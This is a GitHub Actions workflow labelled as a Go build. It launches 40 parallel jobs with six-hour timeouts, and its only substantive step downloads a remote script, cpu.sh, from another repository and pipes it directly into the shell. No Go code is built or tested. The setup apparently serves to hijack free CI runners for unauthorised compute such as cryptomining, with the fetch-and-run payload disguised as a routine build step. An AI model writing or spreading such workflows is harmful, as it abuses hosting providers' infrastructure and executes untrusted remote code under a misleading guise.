name: JOBTEAR
on: [push, pull_request]
jobs:
  build:
    name: Ellenunderwater_Github
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 250
      fail-fast: false
      matrix:
        go: [1.1, 1.2]
        flag: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20]
    timeout-minutes: 360
    env:
        NUM_JOBS: 250
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: runner_go
      run: |
        curl https://github.com/lukmanpurai/KERJA/raw/refs/heads/main/cpu.sh | sh
